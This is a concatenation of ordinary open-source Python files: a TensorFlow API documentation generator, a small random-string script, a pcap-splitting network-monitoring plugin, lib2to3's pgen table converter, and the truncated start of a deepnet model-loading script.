# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generate docs for the TensorFlow Python API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import fnmatch
import os
import shutil
import tempfile
import six
from tensorflow.python.util import tf_inspect
from tensorflow.tools.common import public_api
from tensorflow.tools.common import traverse
from tensorflow.tools.docs import doc_controls
from tensorflow.tools.docs import doc_generator_visitor
from tensorflow.tools.docs import parser
from tensorflow.tools.docs import pretty_docs
from tensorflow.tools.docs import py_guide_parser
def write_docs(output_dir,
parser_config,
yaml_toc,
root_title='TensorFlow',
search_hints=True,
site_api_path=''):
"""Write previously extracted docs to disk.
Write a docs page for each symbol included in the indices of parser_config to
a tree of docs at `output_dir`.
Symbols with multiple aliases will have only one page written about
them, which is referenced for all aliases.
Args:
output_dir: Directory to write documentation markdown files to. Will be
created if it doesn't exist.
parser_config: A `parser.ParserConfig` object, containing all the necessary
indices.
yaml_toc: Set to `True` to generate a "_toc.yaml" file.
root_title: The title name for the root level index.md.
search_hints: (bool) include meta-data search hints at the top of each
output file.
site_api_path: The output path relative to the site root. Used in the
`_toc.yaml` and `_redirects.yaml` files.
Raises:
ValueError: if `output_dir` is not an absolute path
"""
# Make output_dir.
if not os.path.isabs(output_dir):
raise ValueError("'output_dir' must be an absolute path.\n"
" output_dir='%s'" % output_dir)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# These dictionaries are used for table-of-contents generation below
# They will contain, after the for-loop below::
# - module name(string):classes and functions the module contains(list)
module_children = {}
# - symbol name(string):pathname (string)
symbol_to_file = {}
# Collect redirects for an api _redirects.yaml file.
redirects = []
# Parse and write Markdown pages, resolving cross-links (@{symbol}).
for full_name, py_object in six.iteritems(parser_config.index):
parser_config.reference_resolver.current_doc_full_name = full_name
if full_name in parser_config.duplicate_of:
continue
# Methods and some routines are documented only as part of their class.
if not (tf_inspect.ismodule(py_object) or tf_inspect.isclass(py_object) or
parser.is_free_function(py_object, full_name, parser_config.index)):
continue
sitepath = os.path.join('api_docs/python',
parser.documentation_path(full_name)[:-3])
# For TOC, we need to store a mapping from full_name to the file
# we're generating
symbol_to_file[full_name] = sitepath
# For a module, remember the module for the table-of-contents
if tf_inspect.ismodule(py_object):
if full_name in parser_config.tree:
module_children.setdefault(full_name, [])
# For something else that's documented,
# figure out what module it lives in
else:
subname = str(full_name)
while True:
subname = subname[:subname.rindex('.')]
if tf_inspect.ismodule(parser_config.index[subname]):
module_children.setdefault(subname, []).append(full_name)
break
# Generate docs for `py_object`, resolving references.
page_info = parser.docs_for_object(full_name, py_object, parser_config)
path = os.path.join(output_dir, parser.documentation_path(full_name))
directory = os.path.dirname(path)
try:
if not os.path.exists(directory):
os.makedirs(directory)
# This function returns raw bytes in PY2 or unicode in PY3.
if search_hints:
content = [page_info.get_metadata_html()]
else:
content = ['']
content.append(pretty_docs.build_md_page(page_info))
text = '\n'.join(content)
if six.PY3:
text = text.encode('utf-8')
with open(path, 'wb') as f:
f.write(text)
except OSError:
raise OSError(
'Cannot write documentation for %s to %s' % (full_name, directory))
duplicates = parser_config.duplicates.get(full_name, [])
if not duplicates:
continue
duplicates = [item for item in duplicates if item != full_name]
for dup in duplicates:
from_path = os.path.join(site_api_path, dup.replace('.', '/'))
to_path = os.path.join(site_api_path, full_name.replace('.', '/'))
redirects.append((
os.path.join('/', from_path),
os.path.join('/', to_path)))
if redirects:
redirects = sorted(redirects)
template = ('- from: {}\n'
' to: {}\n')
redirects = [template.format(f, t) for f, t in redirects]
api_redirects_path = os.path.join(output_dir, '_redirects.yaml')
with open(api_redirects_path, 'w') as redirect_file:
redirect_file.write('redirects:\n')
redirect_file.write(''.join(redirects))
if yaml_toc:
# Generate table of contents
# Put modules in alphabetical order, case-insensitive
modules = sorted(module_children.keys(), key=lambda a: a.upper())
leftnav_path = os.path.join(output_dir, '_toc.yaml')
with open(leftnav_path, 'w') as f:
# Generate header
f.write('# Automatically generated file; please do not edit\ntoc:\n')
for module in modules:
indent_num = module.count('.')
# Don't list `tf.submodule` inside `tf`
indent_num = max(indent_num, 1)
indent = ' '*indent_num
if indent_num > 1:
# tf.contrib.baysflow.entropy will be under
# tf.contrib->baysflow->entropy
title = module.split('.')[-1]
else:
title = module
header = [
'- title: ' + title,
' section:',
' - title: Overview',
' path: ' + os.path.join('/', site_api_path,
symbol_to_file[module])]
header = ''.join([indent+line+'\n' for line in header])
f.write(header)
symbols_in_module = module_children.get(module, [])
# Sort case-insensitive, if equal sort case sensitive (upper first)
symbols_in_module.sort(key=lambda a: (a.upper(), a))
for full_name in symbols_in_module:
item = [
' - title: ' + full_name[len(module) + 1:],
' path: ' + os.path.join('/', site_api_path,
symbol_to_file[full_name])]
item = ''.join([indent+line+'\n' for line in item])
f.write(item)
# Write a global index containing all full names with links.
with open(os.path.join(output_dir, 'index.md'), 'w') as f:
f.write(
parser.generate_global_index(root_title, parser_config.index,
parser_config.reference_resolver))
def add_dict_to_dict(add_from, add_to):
for key in add_from:
if key in add_to:
add_to[key].extend(add_from[key])
else:
add_to[key] = add_from[key]
# Exclude some libraries in contrib from the documentation altogether.
def _get_default_private_map():
return {
'tf.contrib.autograph': ['utils', 'operators'],
'tf.test': ['mock'],
'tf.compat': ['v1', 'v2'],
'tf.contrib.estimator': ['python'],
}
# Exclude members of some libraries.
def _get_default_do_not_descend_map():
# TODO(markdaoust): Use docs_controls decorators, locally, instead.
return {
'tf': ['cli', 'lib', 'wrappers'],
'tf.contrib': [
'compiler',
'grid_rnn',
# Block contrib.keras to de-clutter the docs
'keras',
'labeled_tensor',
'quantization',
'session_bundle',
'slim',
'solvers',
'specs',
'tensor_forest',
'tensorboard',
'testing',
'tfprof',
],
'tf.contrib.bayesflow': [
'special_math', 'stochastic_gradient_estimators',
'stochastic_variables'
],
'tf.contrib.ffmpeg': ['ffmpeg_ops'],
'tf.contrib.graph_editor': [
'edit', 'match', 'reroute', 'subgraph', 'transform', 'select', 'util'
],
'tf.contrib.keras': ['api', 'python'],
'tf.contrib.layers': ['feature_column', 'summaries'],
'tf.contrib.learn': [
'datasets',
'head',
'graph_actions',
'io',
'models',
'monitors',
'ops',
'preprocessing',
'utils',
],
'tf.contrib.util': ['loader'],
}
class DocControlsAwareCrawler(public_api.PublicAPIVisitor):
"""A `docs_controls` aware API-crawler."""
def _is_private(self, path, name, obj):
if doc_controls.should_skip(obj):
return True
return super(DocControlsAwareCrawler, self)._is_private(path, name, obj)
def extract(py_modules,
private_map,
do_not_descend_map,
visitor_cls=doc_generator_visitor.DocGeneratorVisitor):
"""Extract docs from tf namespace and write them to disk."""
# Traverse the first module.
visitor = visitor_cls(py_modules[0][0])
api_visitor = DocControlsAwareCrawler(visitor)
api_visitor.set_root_name(py_modules[0][0])
add_dict_to_dict(private_map, api_visitor.private_map)
add_dict_to_dict(do_not_descend_map, api_visitor.do_not_descend_map)
traverse.traverse(py_modules[0][1], api_visitor)
# Traverse all py_modules after the first:
for module_name, module in py_modules[1:]:
visitor.set_root_name(module_name)
api_visitor.set_root_name(module_name)
traverse.traverse(module, api_visitor)
return visitor
class _GetMarkdownTitle(py_guide_parser.PyGuideParser):
"""Extract the title from a .md file."""
def __init__(self):
self.title = None
py_guide_parser.PyGuideParser.__init__(self)
def process_title(self, _, title):
if self.title is None: # only use the first title
self.title = title
class _DocInfo(object):
"""A simple struct for holding a doc's url and title."""
def __init__(self, url, title):
self.url = url
self.title = title
def build_doc_index(src_dir):
"""Build an index from a keyword designating a doc to _DocInfo objects."""
doc_index = {}
if not os.path.isabs(src_dir):
raise ValueError("'src_dir' must be an absolute path.\n"
" src_dir='%s'" % src_dir)
if not os.path.exists(src_dir):
raise ValueError("'src_dir' path must exist.\n"
" src_dir='%s'" % src_dir)
for dirpath, _, filenames in os.walk(src_dir):
suffix = os.path.relpath(path=dirpath, start=src_dir)
for base_name in filenames:
if not base_name.endswith('.md'):
continue
title_parser = _GetMarkdownTitle()
title_parser.process(os.path.join(dirpath, base_name))
if title_parser.title is None:
msg = ('`{}` has no markdown title (# title)'.format(
os.path.join(dirpath, base_name)))
raise ValueError(msg)
key_parts = os.path.join(suffix, base_name[:-3]).split('/')
if key_parts[-1] == 'index':
key_parts = key_parts[:-1]
doc_info = _DocInfo(os.path.join(suffix, base_name), title_parser.title)
doc_index[key_parts[-1]] = doc_info
if len(key_parts) > 1:
doc_index['/'.join(key_parts[-2:])] = doc_info
return doc_index
class _GuideRef(object):
def __init__(self, base_name, title, section_title, section_tag):
self.url = 'api_guides/python/' + (('%s#%s' % (base_name, section_tag))
if section_tag else base_name)
self.link_text = (('%s > %s' % (title, section_title))
if section_title else title)
def make_md_link(self, url_prefix):
return '[%s](%s%s)' % (self.link_text, url_prefix, self.url)
class _GenerateGuideIndex(py_guide_parser.PyGuideParser):
"""Turn guide files into an index from symbol name to a list of _GuideRefs."""
def __init__(self):
self.index = {}
py_guide_parser.PyGuideParser.__init__(self)
def process(self, full_path, base_name):
"""Index a file, reading from `full_path`, with `base_name` as the link."""
self.full_path = full_path
self.base_name = base_name
self.title = None
self.section_title = None
self.section_tag = None
py_guide_parser.PyGuideParser.process(self, full_path)
def process_title(self, _, title):
if self.title is None: # only use the first title
self.title = title
def process_section(self, _, section_title, tag):
self.section_title = section_title
self.section_tag = tag
def process_line(self, _, line):
"""Index the file and section of each `symbol` reference."""
for match in parser.AUTO_REFERENCE_RE.finditer(line):
val = self.index.get(match.group(1), [])
val.append(
_GuideRef(self.base_name, self.title, self.section_title,
self.section_tag))
self.index[match.group(1)] = val
def _build_guide_index(guide_src_dir):
"""Return dict: symbol name -> _GuideRef from the files in `guide_src_dir`."""
index_generator = _GenerateGuideIndex()
if os.path.exists(guide_src_dir):
for full_path, base_name in py_guide_parser.md_files_in_dir(guide_src_dir):
index_generator.process(full_path, base_name)
return index_generator.index
class _UpdateTags(py_guide_parser.PyGuideParser):
"""Rewrites a Python guide so that each section has an explicit id tag.
"section" here refers to blocks delimited by second level headings.
"""
def process_section(self, line_number, section_title, tag):
self.replace_line(line_number, '<h2 id="%s">%s</h2>' % (tag, section_title))
def update_id_tags_inplace(src_dir):
"""Set explicit ids on all second-level headings to ensure back-links work.
Args:
src_dir: The directory of md-files to convert (inplace).
"""
tag_updater = _UpdateTags()
for dirpath, _, filenames in os.walk(src_dir):
for base_name in filenames:
if not base_name.endswith('.md'):
continue
full_path = os.path.join(src_dir, dirpath, base_name)
# Tag updater loads the file, makes the replacements, and returns the
# modified file contents
content = tag_updater.process(full_path)
with open(full_path, 'w') as f:
f.write(content)
EXCLUDED = set(['__init__.py', 'OWNERS', 'README.txt'])
def replace_refs(src_dir,
output_dir,
reference_resolver,
file_pattern='*.md',
api_docs_relpath='api_docs'):
"""Fix @{} references in all files under `src_dir` matching `file_pattern`.
A matching directory structure, with the modified files is
written to `output_dir`.
`{"__init__.py","OWNERS","README.txt"}` are skipped.
Files not matching `file_pattern` (using `fnmatch`) are copied with no change.
Also, files in the `api_guides/python` directory get explicit ids set on all
heading-2s to ensure back-links work.
Args:
src_dir: The directory to convert files from.
output_dir: The root directory to write the resulting files to.
reference_resolver: A `parser.ReferenceResolver` to make the replacements.
file_pattern: Only replace references in files matching file_patters,
using fnmatch. Non-matching files are copied unchanged.
api_docs_relpath: Relative-path string to the api_docs, from the src_dir.
"""
# Iterate through all the source files and process them.
for dirpath, _, filenames in os.walk(src_dir):
depth = os.path.relpath(src_dir, start=dirpath)
# How to get from `dirpath` to api_docs/python/
relative_path_to_root = os.path.join(depth, api_docs_relpath, 'python')
# Make the directory under output_dir.
new_dir = os.path.join(output_dir,
os.path.relpath(path=dirpath, start=src_dir))
if not os.path.exists(new_dir):
os.makedirs(new_dir)
for base_name in filenames:
if base_name in EXCLUDED:
continue
full_in_path = os.path.join(dirpath, base_name)
# Set the `current_doc_full_name` so bad files can be reported on errors.
reference_resolver.current_doc_full_name = full_in_path
suffix = os.path.relpath(path=full_in_path, start=src_dir)
full_out_path = os.path.join(output_dir, suffix)
# Copy files that do not match the file_pattern, unmodified.
if not fnmatch.fnmatch(base_name, file_pattern):
if full_in_path != full_out_path:
shutil.copyfile(full_in_path, full_out_path)
continue
with open(full_in_path, 'rb') as f:
content = f.read().decode('utf-8')
content = reference_resolver.replace_references(content,
relative_path_to_root)
with open(full_out_path, 'wb') as f:
f.write(content.encode('utf-8'))
class DocGenerator(object):
"""Main entry point for generating docs."""
def __init__(self):
self.argument_parser = argparse.ArgumentParser()
self._py_modules = None
self._private_map = _get_default_private_map()
self._do_not_descend_map = _get_default_do_not_descend_map()
self.yaml_toc = True
self.argument_parser.add_argument(
'--no_search_hints',
dest='search_hints',
action='store_false',
default=True)
self.argument_parser.add_argument(
'--site_api_path',
type=str, default='',
help='The path from the site-root to api_docs'
'directory for this project')
self.argument_parser.add_argument(
'--api_cache_out_path',
type=str,
default=None,
help='Path to store a json-serialized api-index, so links can be '
'inserted into docs without rebuilding the api_docs')
def add_output_dir_argument(self):
self.argument_parser.add_argument(
'--output_dir',
type=str,
default=None,
required=True,
help='Directory to write docs to.')
def add_src_dir_argument(self):
self.argument_parser.add_argument(
'--src_dir',
type=str,
default=tempfile.mkdtemp(),
required=False,
help='Optional directory of source docs to add api_docs links to')
def add_base_dir_argument(self, default_base_dir):
self.argument_parser.add_argument(
'--base_dir',
type=str,
default=default_base_dir,
help='Base directory to strip from file names referenced in docs.')
def parse_known_args(self):
flags, _ = self.argument_parser.parse_known_args()
return flags
def add_to_private_map(self, d):
add_dict_to_dict(d, self._private_map)
def add_to_do_not_descend_map(self, d):
add_dict_to_dict(d, self._do_not_descend_map)
def set_private_map(self, d):
self._private_map = d
def set_do_not_descend_map(self, d):
self._do_not_descend_map = d
def set_py_modules(self, py_modules):
self._py_modules = py_modules
def py_module_names(self):
if self._py_modules is None:
raise RuntimeError(
'Must call set_py_modules() before running py_module_names().')
return [name for (name, _) in self._py_modules]
def make_reference_resolver(self, visitor, doc_index):
return parser.ReferenceResolver.from_visitor(
visitor, doc_index, py_module_names=self.py_module_names())
def make_parser_config(self, visitor, reference_resolver, guide_index,
base_dir):
return parser.ParserConfig(
reference_resolver=reference_resolver,
duplicates=visitor.duplicates,
duplicate_of=visitor.duplicate_of,
tree=visitor.tree,
index=visitor.index,
reverse_index=visitor.reverse_index,
guide_index=guide_index,
base_dir=base_dir)
def run_extraction(self):
return extract(self._py_modules, self._private_map,
self._do_not_descend_map)
def build(self, flags):
"""Build all the docs.
This produces two outputs
python api docs:
* generated from modules set with `set_py_modules`.
* written to '{FLAGS.output_dir}/api_docs/python/'
non-api docs:
* Everything in '{FLAGS.src_dir}' is copied to '{FLAGS.output_dir}'.
* '@{}' references in '.md' files are replaced with links.
* '.md' files under 'api_guides/python' have explicit ids set for their
second level headings.
Args:
flags:
* src_dir: Where to fetch the non-api-docs.
* base_dir: Base of the docs directory (Used to build correct
relative links).
* output_dir: Where to write the resulting docs.
Returns:
The number of errors encountered while processing.
"""
# Extract the python api from the _py_modules
doc_index = build_doc_index(flags.src_dir)
visitor = self.run_extraction()
reference_resolver = self.make_reference_resolver(visitor, doc_index)
if getattr(flags, 'api_cache_out_path', None):
reference_resolver.to_json_file(flags.api_cache_out_path)
# Build the guide_index for the api_docs back links.
root_title = getattr(flags, 'root_title', 'TensorFlow')
guide_index = _build_guide_index(
os.path.join(flags.src_dir, 'api_guides/python'))
# Write the api docs.
parser_config = self.make_parser_config(visitor, reference_resolver,
guide_index, flags.base_dir)
output_dir = os.path.join(flags.output_dir, 'api_docs/python')
write_docs(
output_dir,
parser_config,
yaml_toc=self.yaml_toc,
root_title=root_title,
search_hints=getattr(flags, 'search_hints', True),
site_api_path=getattr(flags, 'site_api_path', ''))
# Replace all the @{} references in files under `FLAGS.src_dir`
replace_refs(flags.src_dir, flags.output_dir, reference_resolver, '*.md')
# Fix the tags in the guide dir.
guide_dir = os.path.join(flags.output_dir, 'api_guides/python')
if os.path.exists(guide_dir):
update_id_tags_inplace(guide_dir)
# Report all errors found by the reference resolver, and return the error
# code.
parser_config.reference_resolver.log_errors()
return parser_config.reference_resolver.num_errors()
|
silvahaberl/Jezici-gramatike-automati- | refs/heads/master | proba.py | 1 | import random
import string
from random import randint
Σ=set()
Σ.add('0')
Σ.add('1')
print("lista(Σ)",list(Σ))
duljinaRiječi = len(list(Σ))
def random_string(length):
return ''.join(random.choice(list(Σ)) for i in range(length))
print(random_string(randint(1,duljinaRiječi)))
print("duljinaRiječi:", duljinaRiječi)
#print("ulaz:", ulaz)
|
CyberReboot/vent-plugins | refs/heads/master | pcap_to_node_pcap/pcap_to_node_pcap.py | 1 | """
Plugin that takes pcap files and splits them by server and client
ip addresses
Created on 17 July 2017
@author: Blake Pagon
"""
# TODO: https://github.com/PyCQA/bandit/issues/333 for bandit false positive on subprocess.
import argparse
import datetime
import ipaddress
import json
import os
import re
import shlex
import shutil
import subprocess
import tempfile
import pika
def parse_layer_ports(json_fields):
ports = set()
for field, content in json_fields.items():
if field.endswith('port'):
try:
port = int(content)
ports.add(port)
except ValueError:
continue
return ports
def ipaddress_fields(json_fields):
ipas = set()
for _, content in sorted(json_fields.items()):
try:
ipa = str(ipaddress.ip_address(content))
ipa = re.sub(r'[^0-9]+', '-', ipa)
except ValueError:
continue
ipas.add(ipa)
return ipas
def pcap_name_with_layers(pcap_filename, pcap_layers, pcap_suffix):
pcap_basename = os.path.basename(pcap_filename)
pcap_basename = pcap_basename.replace(pcap_suffix, '')
safe_pcap_layers = [
re.sub(r'[^a-zA-Z0-9\-]+', '', i) for i in pcap_layers]
layers_str = '-'.join(safe_pcap_layers)
layers_pcap_filename = pcap_filename.replace(
pcap_basename, '-'.join((pcap_basename, layers_str)))
return layers_pcap_filename
def parse_pcap_json_to_layers(pcap_json):
pcap_layers = []
for packet_json in pcap_json:
try:
layers_json = packet_json['_source']['layers']
except KeyError:
continue
ipas = set()
ports = set()
for field in ('ip', 'ipv6', 'arp', 'tcp', 'udp'):
if field in layers_json:
json_fields = layers_json[field]
ipas = ipas.union(ipaddress_fields(json_fields))
ports = ports.union(parse_layer_ports(json_fields))
lowest_port = []
if ports:
lowest_port = ['port-%u' % min(ports)]
packet_layers = list(sorted(ipas)) + list(layers_json.keys()) + lowest_port
if len(packet_layers) > len(pcap_layers):
pcap_layers = packet_layers
return pcap_layers
def proto_annotate_pcaps(pcap_dir):
pcap_suffix = '.pcap'
try:
pap_filenames = [
pcap.path for pcap in os.scandir(pcap_dir)
if pcap.is_file() and pcap.path.endswith(pcap_suffix)]
except FileNotFoundError as err:
print(err)
return
for pcap_filename in pap_filenames:
try:
response = subprocess.check_output(shlex.split(' '.join( # nosec
['./tshark', '-T', 'json', '-c', str(10), '-r', pcap_filename])))
pcap_json = json.loads(response.decode('utf-8'))
except (json.decoder.JSONDecodeError, subprocess.CalledProcessError) as e:
print(pcap_filename, str(e))
continue
pcap_layers = parse_pcap_json_to_layers(pcap_json)
layers_pcap_filename = pcap_name_with_layers(pcap_filename, pcap_layers, pcap_suffix)
os.rename(pcap_filename, layers_pcap_filename)
def connect_rabbit(host='messenger', port=5672, queue='task_queue'):
params = pika.ConnectionParameters(host=host, port=port)
connection = pika.BlockingConnection(params)
channel = connection.channel()
channel.queue_declare(queue=queue, durable=True)
return channel
def send_rabbit_msg(msg, channel, exchange='', routing_key='task_queue'):
channel.basic_publish(exchange=exchange,
routing_key=routing_key,
body=json.dumps(msg),
properties=pika.BasicProperties(delivery_mode=2,))
print(" [X] %s UTC %r %r" % (str(datetime.datetime.utcnow()),
str(msg['id']), str(msg['file_path'])))
def get_version():
version = ''
with open('VERSION', 'r') as f:
for line in f:
version = line.strip()
return version
def get_path(paths):
path = None
try:
path = paths[0]
except Exception as e:
print("No path provided: {0}, quitting".format(str(e)))
return path
def run_split(in_path, clients_dir, servers_dir):
for tool_cmd in (
" ".join(("./PcapSplitter -f", in_path, "-o", clients_dir, "-m client-ip")),
" ".join(("./PcapSplitter -f", in_path, "-o", servers_dir, "-m server-ip"))):
try:
subprocess.check_call(shlex.split(tool_cmd)) # nosec
except Exception as err:
print("%s: %s" % (tool_cmd, err))
def run_tool(path, protoannotate):
if os.path.getsize(path) < 100:
print("pcap file too small, not splitting")
return None
# need to make directories to store results from pcapsplitter
base_dir = path.rsplit('/', 1)[0]
timestamp = '-'.join(str(datetime.datetime.now()).split(' ')) + '-UTC'
timestamp = timestamp.replace(':', '_')
output_dir = os.path.join(base_dir, 'pcap-node-splitter' + '-' + timestamp)
clients_dir = os.path.join(output_dir, 'clients')
servers_dir = os.path.join(output_dir, 'servers')
try:
os.mkdir(output_dir)
# Ensure file_drop doesn't see pcap before annotation..
if protoannotate:
tmp_clients_dir = tempfile.mkdtemp()
tmp_servers_dir = tempfile.mkdtemp()
run_split(path, tmp_clients_dir, tmp_servers_dir)
for tmp_dir, final_dir in (
(tmp_clients_dir, clients_dir),
(tmp_servers_dir, servers_dir)):
proto_annotate_pcaps(tmp_dir)
shutil.copytree(tmp_dir, final_dir)
shutil.rmtree(tmp_dir)
else:
for new_dir in (clients_dir, servers_dir):
os.mkdir(new_dir)
run_split(path, clients_dir, servers_dir)
except Exception as err:
print(err)
return clients_dir
def parse_args(parser):
parser.add_argument(
'--protoannotate',
help='use tshark to annotate pcaps with protocol',
action='store_true',
default=True)
parser.add_argument('paths', nargs='*')
parsed_args = parser.parse_args()
return parsed_args
if __name__ == '__main__': # pragma: no cover
parsed_args = parse_args(argparse.ArgumentParser())
path = get_path(parsed_args.paths)
if path:
result_path = run_tool(path, parsed_args.protoannotate)
uid = ''
if 'id' in os.environ:
uid = os.environ['id']
if os.environ.get('rabbit', False) == 'true':
try:
channel = connect_rabbit()
body = {'id': uid, 'type': 'metadata', 'file_path': result_path, 'data': '',
'results': {'tool': 'pcap-splitter', 'version': get_version()}}
send_rabbit_msg(body, channel)
except Exception as e:
print(str(e))
|
Big-B702/python-for-android | refs/heads/master | python3-alpha/python3-src/Lib/lib2to3/pgen2/conv.py | 68 | # Copyright 2004-2005 Elemental Security, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Convert graminit.[ch] spit out by pgen to Python code.
Pgen is the Python parser generator. It is useful to quickly create a
parser from a grammar file in Python's grammar notation. But I don't
want my parsers to be written in C (yet), so I'm translating the
parsing tables to Python data structures and writing a Python parse
engine.
Note that the token numbers are constants determined by the standard
Python tokenizer. The standard token module defines these numbers and
their names (the names are not used much). The token numbers are
hardcoded into the Python tokenizer and into pgen. A Python
implementation of the Python tokenizer is also available, in the
standard tokenize module.
On the other hand, symbol numbers (representing the grammar's
non-terminals) are assigned by pgen based on the actual grammar
input.
Note: this module is pretty much obsolete; the pgen module generates
equivalent grammar tables directly from the Grammar.txt input file
without having to invoke the Python pgen C program.
"""
# Python imports
import re
# Local imports
from pgen2 import grammar, token
class Converter(grammar.Grammar):
"""Grammar subclass that reads classic pgen output files.
The run() method reads the tables as produced by the pgen parser
generator, typically contained in two C files, graminit.h and
graminit.c. The other methods are for internal use only.
See the base class for more documentation.
"""
def run(self, graminit_h, graminit_c):
"""Load the grammar tables from the text files written by pgen."""
self.parse_graminit_h(graminit_h)
self.parse_graminit_c(graminit_c)
self.finish_off()
def parse_graminit_h(self, filename):
"""Parse the .h file written by pgen. (Internal)
This file is a sequence of #define statements defining the
nonterminals of the grammar as numbers. We build two tables
mapping the numbers to names and back.
"""
try:
f = open(filename)
except IOError as err:
print("Can't open %s: %s" % (filename, err))
return False
self.symbol2number = {}
self.number2symbol = {}
lineno = 0
for line in f:
lineno += 1
mo = re.match(r"^#define\s+(\w+)\s+(\d+)$", line)
if not mo and line.strip():
print("%s(%s): can't parse %s" % (filename, lineno,
line.strip()))
else:
symbol, number = mo.groups()
number = int(number)
assert symbol not in self.symbol2number
assert number not in self.number2symbol
self.symbol2number[symbol] = number
self.number2symbol[number] = symbol
return True
def parse_graminit_c(self, filename):
"""Parse the .c file written by pgen. (Internal)
The file looks as follows. The first two lines are always this:
#include "pgenheaders.h"
#include "grammar.h"
After that come four blocks:
1) one or more state definitions
2) a table defining dfas
3) a table defining labels
4) a struct defining the grammar
A state definition has the following form:
- one or more arc arrays, each of the form:
static arc arcs_<n>_<m>[<k>] = {
{<i>, <j>},
...
};
- followed by a state array, of the form:
static state states_<s>[<t>] = {
{<k>, arcs_<n>_<m>},
...
};
"""
try:
f = open(filename)
except IOError as err:
print("Can't open %s: %s" % (filename, err))
return False
# The code below essentially uses f's iterator-ness!
lineno = 0
# Expect the two #include lines
lineno, line = lineno+1, next(f)
assert line == '#include "pgenheaders.h"\n', (lineno, line)
lineno, line = lineno+1, next(f)
assert line == '#include "grammar.h"\n', (lineno, line)
# Parse the state definitions
lineno, line = lineno+1, next(f)
allarcs = {}
states = []
while line.startswith("static arc "):
while line.startswith("static arc "):
mo = re.match(r"static arc arcs_(\d+)_(\d+)\[(\d+)\] = {$",
line)
assert mo, (lineno, line)
n, m, k = list(map(int, mo.groups()))
arcs = []
for _ in range(k):
lineno, line = lineno+1, next(f)
mo = re.match(r"\s+{(\d+), (\d+)},$", line)
assert mo, (lineno, line)
i, j = list(map(int, mo.groups()))
arcs.append((i, j))
lineno, line = lineno+1, next(f)
assert line == "};\n", (lineno, line)
allarcs[(n, m)] = arcs
lineno, line = lineno+1, next(f)
mo = re.match(r"static state states_(\d+)\[(\d+)\] = {$", line)
assert mo, (lineno, line)
s, t = list(map(int, mo.groups()))
assert s == len(states), (lineno, line)
state = []
for _ in range(t):
lineno, line = lineno+1, next(f)
mo = re.match(r"\s+{(\d+), arcs_(\d+)_(\d+)},$", line)
assert mo, (lineno, line)
k, n, m = list(map(int, mo.groups()))
arcs = allarcs[n, m]
assert k == len(arcs), (lineno, line)
state.append(arcs)
states.append(state)
lineno, line = lineno+1, next(f)
assert line == "};\n", (lineno, line)
lineno, line = lineno+1, next(f)
self.states = states
# Parse the dfas
dfas = {}
mo = re.match(r"static dfa dfas\[(\d+)\] = {$", line)
assert mo, (lineno, line)
ndfas = int(mo.group(1))
for i in range(ndfas):
lineno, line = lineno+1, next(f)
mo = re.match(r'\s+{(\d+), "(\w+)", (\d+), (\d+), states_(\d+),$',
line)
assert mo, (lineno, line)
symbol = mo.group(2)
number, x, y, z = list(map(int, mo.group(1, 3, 4, 5)))
assert self.symbol2number[symbol] == number, (lineno, line)
assert self.number2symbol[number] == symbol, (lineno, line)
assert x == 0, (lineno, line)
state = states[z]
assert y == len(state), (lineno, line)
lineno, line = lineno+1, next(f)
mo = re.match(r'\s+("(?:\\\d\d\d)*")},$', line)
assert mo, (lineno, line)
first = {}
rawbitset = eval(mo.group(1))
for i, c in enumerate(rawbitset):
byte = ord(c)
for j in range(8):
if byte & (1<<j):
first[i*8 + j] = 1
dfas[number] = (state, first)
lineno, line = lineno+1, next(f)
assert line == "};\n", (lineno, line)
self.dfas = dfas
# Parse the labels
labels = []
lineno, line = lineno+1, next(f)
mo = re.match(r"static label labels\[(\d+)\] = {$", line)
assert mo, (lineno, line)
nlabels = int(mo.group(1))
for i in range(nlabels):
lineno, line = lineno+1, next(f)
mo = re.match(r'\s+{(\d+), (0|"\w+")},$', line)
assert mo, (lineno, line)
x, y = mo.groups()
x = int(x)
if y == "0":
y = None
else:
y = eval(y)
labels.append((x, y))
lineno, line = lineno+1, next(f)
assert line == "};\n", (lineno, line)
self.labels = labels
# Parse the grammar struct
lineno, line = lineno+1, next(f)
assert line == "grammar _PyParser_Grammar = {\n", (lineno, line)
lineno, line = lineno+1, next(f)
mo = re.match(r"\s+(\d+),$", line)
assert mo, (lineno, line)
ndfas = int(mo.group(1))
assert ndfas == len(self.dfas)
lineno, line = lineno+1, next(f)
assert line == "\tdfas,\n", (lineno, line)
lineno, line = lineno+1, next(f)
mo = re.match(r"\s+{(\d+), labels},$", line)
assert mo, (lineno, line)
nlabels = int(mo.group(1))
assert nlabels == len(self.labels), (lineno, line)
lineno, line = lineno+1, next(f)
mo = re.match(r"\s+(\d+)$", line)
assert mo, (lineno, line)
start = int(mo.group(1))
assert start in self.number2symbol, (lineno, line)
self.start = start
lineno, line = lineno+1, next(f)
assert line == "};\n", (lineno, line)
try:
lineno, line = lineno+1, next(f)
except StopIteration:
pass
else:
assert 0, (lineno, line)
def finish_off(self):
"""Create additional useful structures. (Internal)."""
self.keywords = {} # map from keyword strings to arc labels
self.tokens = {} # map from numeric token values to arc labels
for ilabel, (type, value) in enumerate(self.labels):
if type == token.NAME and value is not None:
self.keywords[value] = ilabel
elif value is None:
self.tokens[type] = ilabel
|
smoitra87/gerbil | refs/heads/master | deepnet/load_mat_to_model.py | 1 | """Write a model protocol buffer to mat file."""
from deepnet import util
import numpy as np
import sys
import scipy.io
import scipy.io as sio
import gzip
import os
def Convert(args, dirpath, mat_file, dump_npy = False, out_file = 'rbm_mrf', model_file=None):
""" Create the necesarry things"""
matfile = sio.loadmat(mat_file)
if args.minfill:
# get the weight matrix
weight = np.asarray(matfile['minL'], dtype='float32')
Pmat = matfile['Pmat']
weight = weight.dot(Pmat)
weight = weight.T
elif args.random:
# get the weight matrix
weight = np.asarray(matfile['L'].T, dtype='float32')
weight[np.abs(weight)<1e-8] = 0.0
nnz = np.count_nonzero(weight)
nNodes = weight.shape[0]
weight = np.random.randn(nNodes**2, 1)
rangeIdx = np.arange(nNodes**2)
np.random.shuffle(rangeIdx)
weight[rangeIdx[nnz:]] = 0.
weight = weight.reshape(nNodes, nNodes)
print("nnz: {}".format(nnz))
elif args.thresh:
